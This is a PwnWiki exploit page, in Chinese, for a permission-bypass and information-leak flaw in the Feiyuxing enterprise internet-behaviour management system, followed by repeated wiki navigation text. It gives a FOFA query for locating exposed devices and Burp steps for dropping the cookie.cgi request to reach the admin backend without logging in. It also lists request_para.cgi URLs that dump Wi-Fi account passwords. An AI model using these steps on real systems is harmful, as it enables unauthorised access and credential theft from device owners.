飛魚星企業級智能上網行為管理系統權限繞過信息洩露漏洞

FOFA

title="飞鱼星企业级智能上网行为管理系统"

漏洞利用

訪問主頁使用Burp抓包；

http://xxx.xxx.xxx.xxx/home/index.html

使用Burp Dorp cookie.cgi請求包

成功越權後台，其中還存在敏感信息洩露

/request_para.cgi?parameter=wifi_info #獲取ALL WIFI賬號密碼
/request_para.cgi?parameter=wifi_get_5g_host #獲取5GWIFI賬號密碼
/request_para.cgi?parameter=wifi_get_2g_host #獲取2GWIFI賬號密碼

Anonymous

Search

飛魚星企業級智能上網行為管理系統權限繞過信息洩露漏洞

Namespaces

More

Page actions

FOFA

漏洞利用

Navigation

Navigation

Community

PwnWiki.org

Wiki tools

Wiki tools

Anonymous

Search

飛魚星 企業級智能上網行為管理系統 權限繞過信息洩露漏洞

FOFA

漏洞利用

Navigation

Wiki tools

Page tools

飛魚星企業級智能上網行為管理系統權限繞過信息洩露漏洞